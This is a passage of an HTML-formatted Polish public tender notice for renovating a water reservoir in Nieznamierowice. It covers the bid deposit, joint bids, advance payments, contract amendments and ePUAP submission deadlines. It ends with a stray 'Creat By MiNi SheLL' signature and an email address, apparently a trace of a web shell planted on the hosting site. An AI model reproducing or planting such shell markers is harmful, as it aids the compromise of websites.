albo do reprezentowania w postępowaniu i zawarcia umowy. Dokument pełnomocnictwa musi być sporządzony w postaci elektronicznej – załącznik nr 5.<br/>5. Dowód wniesienia wadium (jeśli jest wymagane), oryginał w przypadku wnoszenia wadium w innej formie niż pieniądz.<br/>6. Kosztorysy ofertowe.<br/>7. Wszystkie dokumenty składane wraz z ofertą powinny być aktualne na dzień ich złożenia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wadium w wysokości 15 000,00 zł (słownie: piętnaście tysięcy złotych) należy wnieść przed upływem terminu składania ofert.<br/>2.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2022 r. poz. 2080).<br/>3.	Dowód wniesienia wadium w oryginale należy załączyć do oferty jeżeli wadium zostało wniesione w formie niepieniężnej. <br/>4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:<br/>Nr rachunku: 56 9145 1053 3200 2378 2000 0017<br/>z dopiskiem „Remont zbiornika wodnego w Nieznamierowicach i zagospodarowanie terenu wokół zbiornika” – nr postępowania ZP.271.8.2022.<br/>5.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>6.	Zamawiający zwraca wadium zgodnie z art. 98, z zastrzeżeniem art. 98 ust. 6 pkt.1 ustawy Pzp.<br/>7.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli:<br/>1)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1, oświadczenia, o którym mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3), co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej; <br/>2)	Wykonawca, którego oferta została wybrana;<br/>3)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;<br/>4)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; <br/>5)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Zamawiający dopuszcza składanie ofert przez dwóch lub więcej Wykonawców w ramach tzw. wspólnej oferty, pod warunkiem spełnienia następujących wymagań.<br/>2. Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,<br/>a) dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli, wymienione we właściwym rejestrze lub ewidencji Wykonawców,<br/>b) każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi udzielić pełnomocnictwa w tym samym zakresie.<br/>3. Wykonawca składający ofertę wspólną nie może złożyć w jednym postępowaniu o udzielenie zamówienia publicznego odrębnej oferty własnej lub drugiej oferty wspólnie z innym Wykonawcami. Jeśli tak się stanie to wszystkie oferty z udziałem tego Wykonawcy zostaną odrzucone.<br/>4. Wykonawcy wspólnie ubiegających się o udzielenie zamówienia publicznego ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy (jeśli jest wymagane). Dla Zamawiającego nie są wiążące w tym zakresie wzajemne uregulowania umowne pomiędzy Wykonawcami. Zamawiający może żądać<br/>wykonania zamówienia w całości od któregokolwiek z Wykonawców, od kilku lub od wszystkich łącznie.<br/>5. Oświadczenia, formularze, dokumenty sporządzone wzorach, składa i opisuje w imieniu wszystkich Wykonawców, Pełnomocnik lub wszyscy Wykonawcy.<br/>6. Kopie dokumentów załączone do oferty muszą być opisane „za zgodność z oryginałem” i podpisane przez Wykonawcę, Pełnomocnika lub wszystkich Wykonawców.<br/>7. Wszelka korespondencja w sprawie postępowania będzie prowadzona przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy wpisać na formularzu oferty.<br/>8. Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający udzieli Wykonawcy zaliczki na poczet realizacji zamówienia w wysokości 5% wartości wynagrodzenia brutto zamówienia.<br/>3. Warunkiem otrzymania zaliczki jest przystąpienie przez Wykonawcę do wykonywania Robót w terminie wynikającym z niniejszej Umowy oraz złożenie w terminie:<br/>1) zabezpieczenia zaliczki w jednej lub kilku formach przewidzianych w art. 442 ustawy Pzp,<br/>2) faktury zaliczkowej.<br/>Szczegóły we wzorze umowy - zał. nr 2 do SWZ. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, z wyjątkiem zmian wynikających z okoliczności opisanych w poniższych punktach.<br/>2.	Dopuszcza się zmiany umowy w stosunku do treści wybranej oferty w zakresie określonym w pkt 3, 5 i 6 w sytuacji, gdy podczas wykonywania przedmiotu umowy pojawiły się okoliczności, których w trakcie sporządzania dokumentacji projektowej nie można było przewidzieć i jednocześnie powodują one, że wykonanie robót budowlanych zgodnie z dokumentacją projektową lub specyfikacją techniczną wykonania i odbioru robót stanowiłoby wadę w prawidłowym funkcjonowaniu obiektu.<br/>3. Zmiany umowy mogą dotyczyć terminu wykonania zamówienia wyłącznie w przypadkach:<br/>3.1.	konieczności wykonania robót zamiennych ze względu na zasady wiedzy technicznej i sztuki budowlanej lub konieczności sporządzenia i uzgodnienia dodatkowej dokumentacji, która wymaga dodatkowego czasu ponad termin wynikający z umowy.<br/>3.2.	prac lub badań archeologicznych powodujących, konieczność wstrzymania robót objętych niniejszą umową. <br/>3.3.	opóźnienia w wydaniu decyzji, zezwoleń, uzgodnień itp., do których wydania właściwe organy są zobowiązane na mocy prawa, jeżeli nie są następstwem okoliczności , za które odpowiedzialność ponosi Wykonawca.<br/>3.4.	zaistnienia niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie prac budowlanych lub spełnienie warunków technologicznych, udokumentowanych w dzienniku budowy.<br/>3.5.	okoliczności wynikających z tzw. „siły wyższej” w rozumieniu kodeksu cywilnego.<br/>4. Wstrzymanie robót z w/w powodów musi być potwierdzone w dzienniku budowy i zaakceptowane przez inspektora nadzoru.<br/>5. Zamawiający dopuszcza zmianę kierownika budowy, w sytuacji zdarzeń losowych uniemożliwiających mu pełnienie jego funkcji. Zmiana taka może nastąpić tylko na osoby, które spełniają warunki w SWZ. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 3 dni wraz z dołączeniem określonych w SWZ dokumentów potwierdzających wymagane kwalifikacje zawodowe danej osoby.<br/>6. Warunki dokonania zmian:<br/> 6.1.Wniosek o dokonanie zmian postanowień zawartej umowy musi być sporządzony na piśmie.<br/> 6.2. Strona występująca o zmianę postanowień zawartej umowy opisze zaistniałe okoliczności i uzasadni ich zaistnienie.<br/> 6.3. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, wyrażoną na piśmie, pod rygorem nieważności.<br/>7. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-04 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę pod rygorem nieważności za pomocą „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego w miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-04 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Oferta powinna obejmować wszystkie koszty składające się na realizację zamówienia.<br/>2. Wykonawcy przedstawiają oferty zgodne z wymaganiami SWZ na formularzu o treści zgodnej z załącznikiem nr 1 do SWZ. Dołączając do oferty wypełnione kosztorysy ofertowe zamieszczone na stronie internetowej prowadzonego postępowania. <br/>3. Ofertę należy sporządzić w formie pisemnej w języku polskim. Dokumenty wchodzące w skład oferty muszą być czytelne. Dokumenty sporządzone w innym języku niż język polski winne być złożone wraz z tłumaczeniem na język polski. Oferta należy podpisać przez osobę uprawnioną do składania oświadczeń woli w zakresie praw i obowiązków majątkowych Wykonawcy.<br/>3.1. Wszystkie strony oferty oraz wszelkie miejsca, w których Wykonawca naniósł zmiany, powinny być parafowane przez osobę uprawnioną.<br/>3.2. Strony oferty należy podpisać przez osobę uprawnioną.<br/>3.3. Wykonawca może złożyć tylko jedną ofertę. Złożenie większej liczby ofert spowoduje odrzucenie wszystkich ofert złożonych przez danego Wykonawcę.<br/>3.4. Oferta może być złożona tylko do upływu terminu składania ofert. Do upływu terminu składania ofert Wykonawca może wycofać ofertę.<br/>3.5. Wykonawca składa ofertę pod rygorem nieważności za pomocą „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego w miniPortalu w terminie do dnia 4 listopada 2022 r. do godz. 11.00. Formularz do zaszyfrowania ofert jest dostępny dla Wykonawców w miniPortalu. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na której prowadzona będzie korespondencja związana z postępowaniem.<br/>3.6. Do oferty należy dołączyć druk formularza oferty w postaci elektronicznej lub formie elektronicznej opatrzonej elektronicznym kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym, a następnie wraz z plikami stanowiącymi ofertę skompresować do jednego pliku archiwum (ZIP).<br/>3.7. Sposób złożenia oferty, w tym jej zaszyfrowanie opisany jest w instrukcji użytkownika, na stronie https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf<br/>3.8. Wykonawca może przed upływem terminu składania ofert zmienić lub wycofać ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku”. Sposób zmiany i wycofania oferty został opisany w Instrukcji użytkownika dostępnej na stronie https://miniportal.uzp.gov.pl<br/>Po upływie terminu na składanie ofert nie jest możliwe dokonanie jej zmiany lub wycofania.<br/>3.9. Jeżeli dokumenty elektroniczne przekazane za pomocą środków komunikacji elektronicznej zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (tj. Dz. U. z 2022 r. poz. 1233), co do których Wykonawca zastrzega, że nie mogą być udostępnione innym uczestnikom postępowania niż Zamawiający, Wykonawca powinien złożyć je w osobnym pliku wraz z jednoczesnym zaznaczeniem polecenia: „Załącznik stanowiący tajemnicę przedsiębiorstwa”, a następnie wraz z plikami stanowiącymi jawną część skompresować do jednego pliku archiwum (ZIP).

Creat By MiNi SheLL
Email: jattceo@gmail.com